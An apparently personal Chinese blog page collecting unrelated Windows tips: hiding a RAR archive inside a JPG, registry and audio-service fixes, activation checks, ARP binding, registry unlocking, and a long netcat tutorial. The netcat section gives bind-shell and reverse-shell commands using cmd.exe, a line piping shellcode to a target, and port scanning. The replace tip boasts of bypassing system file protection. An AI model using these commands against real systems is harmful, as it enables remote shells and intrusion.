暗月梦魂 's Home

copy/b d：xxx.jpg+d：xxx.rar d：xxx.jpg

这个xxx.rar可以放很多东西

将图片下载以后将图片后缀 jpg 改为 rar然后 双击即可打开

win+R,输入”regedit”打开注册表编辑器,搜索”Audiosrv”~用全字匹配，把里面的RequiredPrivileges后面对应的Data数据里面的数据的后两项删除，只保留SeChangeNotifyPrivilege。

注册表修改后进入控制面板——管理工具——进入服务——双击Windows Audio，选择登陆——此帐户——浏览——高级——立即查找——LOCALSERVICE确定——密码清空——Ok！！！！

方法一.直接打开WIN7 Activation点击”点击验证”(推荐)；
方法二.在”运行”里输入 slmgr.vbs -dli 并回车；
方法二.在”运行”里输入 slmgr.vbs -xpr 并回车；
方法二.在”运行”里输入 winver 并回车；
方法四.在”运行”里输入 slmgr.vbs -dlv 并回车；
方法五.右键我的电脑属性 查看是否处于激活状态.

netcat被誉为网络安全界的‘瑞士军刀’，相信没有什么人不认识它吧……

一个简单而有用的工具，透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具，

能够直接由其它程序和脚本轻松驱动。同时，它也是一个功能强大的网络调试和探测工具，能够建立你需要的几

乎所有类型的网络连接，还有几个很有意思的内置功能(详情请看下面的使用方法)。

在中国，它的WINDOWS版有两个版本，一个是原创者Chris Wysopal写的原版本，另一个是由‘红与黑’编译

后的新‘浓缩’版。‘浓缩’版的主程序只有10多KB（10多KB的NC是不能完成下面所说的第4、第5种使用方法，

有此功能的原版NC好象要60KB：P），虽然”体积”小，但很完成很多工作。

=====================================================================================================

软件介绍：

工具名：Netcat

作者：Hobbit && Chris Wysopal

网址：http://www.atstake.com/research/tools/network_utilities/

类别：开放源码

平台：Linux/BSD/Unix/Windows

WINDOWS下版本号：[v1.10 NT]

=====================================================================================================

参数介绍：

‘nc.exe -h’即可看到各参数的使用方法。

基本格式：nc [-options] hostname port[s] [ports] …

nc -l -p port [options] [hostname] [port]

-d 后台模式

-e prog 程序重定向，一旦连接，就执行 [危险!!]

-g gateway source-routing hop point[s], up to 8

-G num source-routing pointer: 4, 8, 12, …

-h 帮助信息

-i secs 延时的间隔

-l 监听模式，用于入站连接

-L 连接关闭后,仍然继续监听

-n 指定数字的IP地址，不能用hostname

-o file 记录16进制的传输

-p port 本地端口号

-r 随机本地及远程端口

-s addr 本地源地址

-t 使用TELNET交互方式

-u UDP模式

-v 详细输出–用两个-v可得到更详细的内容

-w secs timeout的时间

-z 将输入输出关掉–用于扫描时

端口的表示方法可写为M-N的范围格式。

=====================================================================================================

基本用法：

大概有以下几种用法：

1)连接到REMOTE主机，例子：

格式：nc -nvv 192.168.x.x 80

讲解：连到192.168.x.x的TCP80端口

2)监听LOCAL主机，例子：

格式：nc -l -p 80

讲解：监听本机的TCP80端口

3)扫描远程主机，例子：

格式：nc -nvv -w2 -z 192.168.x.x 80-445

讲解：扫描192.168.x.x的TCP80到TCP445的所有端口

4)REMOTE主机绑定SHELL，例子：

格式：nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe

讲解：绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口

5)REMOTE主机绑定SHELL并反向连接，例子：

格式：nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354

讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口

以上为最基本的几种用法（其实NC的用法还有很多，

当配合管道命令”|”与重定向命令”<“、”>”等等命令功能更强大……）。

=====================================================================================================

高级用法：

6)作攻击程序用，例子：

格式1：type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80

格式2：nc -nvv 192.168.x.x 80 < c:\exploit.txt

讲解：连接到192.168.x.x的80端口，并在其管道中发送’c:\exploit.txt’的内容(两种格式确有相同的效果，

真是有异曲同工之妙:P)

附：’c:\exploit.txt’为shellcode等

7)作蜜罐用[1]，例子：

格式：nc -L -p 80

讲解：使用’-L'(注意L是大写)可以不停地监听某一个端口，直到ctrl+c为止

8)作蜜罐用[2]，例子：

格式：nc -L -p 80 > c:\log.txt

讲解：使用’-L’可以不停地监听某一个端口，直到ctrl+c为止，同时把结果输出到’c:\log.txt’中，如果把‘>’

改为‘>>’即可以追加日志

附：’c:\log.txt’为日志等

9)作蜜罐用[3]，例子：

格式1：nc -L -p 80 < c:\honeypot.txt

格式2：type.exe c:\honeypot.txt|nc -L -p 80

讲解：使用’-L’可以不停地监听某一个端口，直到ctrl+c为止，并把’c:\honeypot.txt’的内容‘送’入其

管道中

附：’c:\honeypot.txt’为欺骗数据等

直接运行cmd，运行arp -d * ，arp -s会出现下面的错误提示：

ARP 项删除失败: 请求的操作需要提升。

ARP 项添加失败: 拒绝访问。或提示：ARP 项添加失败: 请求的操作需要提升。
（英文版提示：The ARP entry addition failed: Access is denied. ）

如何解决呢？
运行arp -d * 需要用管理员身份运行，进入windows\system32文件夹找到cmd.exe，右键“以管理员身份运行”，这样打开cmd程序就能运行arp -d命令了。但是这样还是不能运行arp -s 进行静态mac绑定，大概是win7禁用了这个命令，需要用netsh命令。

具体做法是：

1、先运行：netsh i i show in 找到正在使用的网卡idx号

Idx     Met         MTU          状态                名称
—  ———-  ———-  ————  —————————
1          50  4294967295  connected     Loopback Pseudo-Interface 1
11        4251        1500  connected     本地连接

2、然后运行：netsh -c i i add neighbors 11 192.168.11.1 94-0c-6d-d4-dd-2e 就可以进行绑定了，这里11是idx号。

再次ARP -A 查看,发现已经绑定IP.

PS:xp中可以使用arp -s 网关IP 网关MAC地址 绑定为静态地址.

一、scanreg/restore
regedit.exe即可在Widnows下执行，也可以在DOS下执行，利用它可以把注册表或其中的一部分导出到一个文件中可以将你修改后的注册表文件导入到注册表中。

edit.exe是一个DOS下的编辑程序。可用它对你导出的注册表文件进行编辑。上网的朋友经常会遇到IE标题栏的内容被修改和注册表被锁住的情况，下面笔者以解开被锁的注册表为例一说具体的操作过程。

1、导出你想要修改的注册表分支

提示：在注册表中，决定是否允许修改注册表的值项的位置是：
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current

Version\Policies\Syetem

鍵下面的DisableRegistryTools,如果它的值是“1”，则表示禁止修改注册表，“0”则表示允许修改注册表。有的网站就是用恶意代码将它的值改为“1”，从而禁止你用regedit.exe 来修改注册表。

命令格式：
regedit /e ls.reg

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersin\

Policies\System

说明：/e这个参数的功能是导出注册表文件。
ls.reg是导出的注册表文件名。
后面的KEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION
\POLICIES\SYSTEM是你要导出的注册表分支。锁住注册表不让你修改的值项就在这个主键的下面。

2、在DOS下面用edit.exe对ls.reg进行修改。
修改的方法很简单：运行edit，打开ls.reg，找到DisableRegistryTools，

然将其后的值改为0。
3、把修改好的注册表文件导入到注册表中。
命令格式：regedit ls.reg即在regedit后面加上你修改后的注册表文件。

三、自己编辑注册表文件
如果你掌握了第二种方法，那么你就可以自己编一个注册表文件，在DOS下用regedit.exe 命令导入到注册表中，来达到修改注册表的目的。与windows下编辑注册表文件不同的是，在DOS下编写注册表文件只能用edit.exe来完成。编写完成后，将文件存为扩展名为.reg的注册表文件，导入到注册表中即可。

注：在修改注册表之前记得备份。

四、regedit /参数 文件名

s /导入 .reg 文件进注册表（安静模式）
/e 导出注册表文件
例：regedit /e filename.reg HKEY_LOCAL_MACHINESYSTEM
/L:system 指定 system.dat
/R:user 指定 user.dat
/C 压缩 [文件名] (Windows 98)

用来替换文件的replace，连正在使用的文件也能替换。非常无敌。
比如：在C：\下建一个目录，c：\aaa
然后复制一首mp3到c:\aaa并命名为c:\aaa\a.mp3
然后再复制另一首歌到C:\a.mp3
然后用media player 播放c:\aaa\a.mp3
在命令提示符下输入：replace c:\a.mp3 c:\aaa
过一会，是不是播放的歌已变为另一首。
用这个命令来替换系统文件真是太爽了，并且XP的系统文件保护也对它无效。
再也不用到安全模式下去替换文件了

格式
REPLACE [drive1:][path1]filename [drive2:][path2] [/A] [/P] [/R] [/W]
REPLACE [drive1:][path1]filename [drive2:][path2] [/P] [/R] [/S] [/W]

[drive1:][path1]filename 指定源文件。
[drive2:][path2] 指定要替换文件的
目录。
/A 把新文件加入目标目录。不能和
/S 或 /U 命令行开关搭配使用。
/P 替换文件或加入源文件之前会先提示您
进行确认。
/R 替换只读文件以及未受保护的
文件。
/S 替换目标目录中所有子目录的文件。
不能与 /A 命令选项
搭配使用。
/W 等您插入磁盘以后再运行。
/U 只会替换或更新比源文件日期早的文件。
不能与 /A 命令行开关搭配使用。